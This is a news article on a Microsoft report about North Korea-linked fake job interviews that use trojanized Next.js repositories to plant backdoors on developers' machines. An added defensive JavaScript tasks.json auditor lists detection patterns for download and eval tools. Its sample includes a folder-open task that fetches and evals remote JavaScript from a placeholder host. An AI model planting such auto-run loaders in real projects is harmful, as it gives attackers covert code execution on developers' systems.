Malicious Next.js repositories are being used to target developers through fake job interviews, aiming to establish remote code execution and persistent command-and-control access on infected machines. Microsoft researchers linked this activity to a broader cluster of threats, associated with North Korea's Lazarus APT, that use job-themed lures to infiltrate developer workflows. The campaign's objective is to compromise systems containing high-value assets like source code and cloud access. The attack employs methods like abusing Visual Studio Code automation or embedding obfuscated code into development assets to retrieve and execute malicious payloads.
Malicious Next.js Repos Target Developers Via Fake Job Interviews
Linked to North Korean fake job-recruitment campaigns, the poisoned repositories are aimed at establishing persistent access to infected machines.
Attackers are targeting developers with malicious Next.js repositories to perform remote code execution (RCE) and establish a persistent command-and-control (C2) channel on infected machines in a campaign tied to North Korea's fake job-recruitment scams.
Microsoft sounded the alarm on the activity, which delivers malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender Experts and the Microsoft Defender Security Research Team discovered various Trojanized repositories that offered different execution paths for delivery of a backdoor to compromise developer systems.
"The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control," according to a blog post published Tuesday by the two Microsoft security teams.
Without specifically attributing the campaign to North Korea, the researchers noted that the activity "aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution," a cluster associated with North Korea's Lazarus APT. The blog post also includes links to third-party research earlier this year about North Korean APT activity tied to Microsoft Visual Studio Code. Indeed, North Korean actors for years have been persistently targeting developers by dangling job opportunities that, as part of a fake job interview, ask them to participate in sample development challenges that deliver malicious code to their machines.
"This developer‑targeting campaign shows how a recruiting‑themed 'interview project' can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend," the blog post stated.
The ultimate objective of the campaign is to gain execution on developer systems that often contain high‑value assets such as source code, environment secrets, and access to build or cloud resources, according to Microsoft. The campaign once again demonstrates how developer workflows are a primary attack surface for cyber espionage and other activity that can lead to further compromise of the entire software supply chain, according to the researchers.
Repositories Leading to Backdoor Activity
The researchers discovered the campaign recently when Microsoft Defender flagged suspicious outbound connections from Node.js processes to attacker-controlled infrastructure, eventually tracking the activity to Next.js repositories all exhibiting the same malicious behavior. Next.js is a widely used open source Web development framework maintained by cloud software vendor Vercel.
The malicious repositories initiate one of two execution paths that deliver a lightweight registration stage to establish host identity as well as bootstrap code. These eventually lead to runtime retrieval and in-memory invocation of attacker-controlled JavaScript that turns into a persistent C2 connection for delivering further payloads and exfiltrating data from infected systems.
Some repositories abuse Visual Studio Code workspace automation by including a .vscode/tasks.json configured to execute tasks automatically when a workspace is opened and trusted, triggering a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious logic directly into development assets so that when a developer runs standard build commands or starts a development server, the disguised code decodes and fetches additional payloads.
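The `.vscode/tasks.json` auto-run abuse described above can be checked for before a workspace is trusted; the following is an added example written for this page, not code from Microsoft or Vercel, and its detection patterns and sample `tasks.json` are constructed assumptions rather than published indicators.

```javascript
// Added example (not from the Microsoft post): audit a VS Code .vscode/tasks.json
// for tasks that execute automatically once a workspace is opened and trusted.
// The SUSPICIOUS patterns are an illustrative assumption, not Microsoft's indicators.
const SUSPICIOUS = [
  /\bnode\s+-e\b/i,                         // inline JavaScript passed to node
  /\b(curl|wget|Invoke-WebRequest|iwr)\b/i, // command-line download tools
  /https?:\/\//i,                           // hard-coded URL inside a task
  /\beval\s*\(/i,                           // dynamic evaluation
  /\b(atob|Buffer\.from)\s*\(/i,            // decoding an embedded blob
  /[A-Za-z0-9+\/]{40,}={0,2}/,              // long base64-looking literal
];
// tasks.json is JSONC: drop block comments and whole-line // comments before parsing
// (simple approach; it does not handle comment markers inside string values).
function parseJsonc(text) {
  const noBlock = text.replace(/\/\*[\s\S]*?\*\//g, "");
  return JSON.parse(noBlock.replace(/^\s*\/\/.*$/gm, ""));
}
// Rebuild the command line VS Code would run for one task entry.
function taskCommandLine(task) {
  const parts = [task.command, ...(task.args || [])];
  return parts.filter((p) => typeof p === "string").join(" ");
}
// One finding per task. A task with runOn "folderOpen" executes without any click
// as soon as the folder is trusted, so it deserves review before trusting the workspace.
function auditTasksJson(text) {
  const doc = parseJsonc(text);
  return (doc.tasks || []).map((task) => {
    const cmd = taskCommandLine(task);
    const autoRun = Boolean(task.runOptions && task.runOptions.runOn === "folderOpen");
    const hits = SUSPICIOUS.filter((re) => re.test(cmd)).length;
    let severity = "info";
    if (autoRun && hits > 0) severity = "high";
    else if (autoRun || hits > 0) severity = "medium";
    return { label: task.label, autoRun, hits, severity };
  });
}
// Constructed sample: a benign dev task next to one that fetches and runs remote
// JavaScript on folder open (placeholder host, not a real indicator).
const SAMPLE_TASKS_JSON = `{
  // VS Code tasks (JSONC)
  "version": "2.0.0",
  "tasks": [
    { "label": "dev", "type": "shell", "command": "npm", "args": ["run", "dev"] },
    { "label": "setup", "type": "shell", "command": "node", "runOptions": { "runOn": "folderOpen" },
      "args": ["-e", "fetch('http://example.invalid/s.js').then(r=>r.text()).then(eval)"] }
  ]
}`;
console.log(auditTasksJson(SAMPLE_TASKS_JSON));
```

Running it reports the `dev` task as informational and the auto-run `setup` task as high severity because it both starts on folder open and carries an inline `node -e` with a hard-coded URL.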
Developer Attacks Rage On
North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021, when security researchers uncovered the Dream Jobs campaign, which sent fake job offers that linked to malicious Web files. This campaign evolved into more sophisticated socially engineered attacks in which developers were lured into participating in fake development projects or recruitment challenges that delivered spyware and other malware.
The latest discovery of weaponized Next.js repositories illustrates threat actors' commitment to targeting developers not only to establish a spy channel but also to poison the software supply chain as a whole. To defend against this, security operations teams and DevSecOps leaders "should treat developer workflows as a privileged attack surface, integrating IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs," according to Microsoft.
Organizations can do this by enforcing strict trust policies for IDEs like Visual Studio Code; deploying attack surface reduction rules via Microsoft Defender for Endpoint to constrain risky script execution behaviors; and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.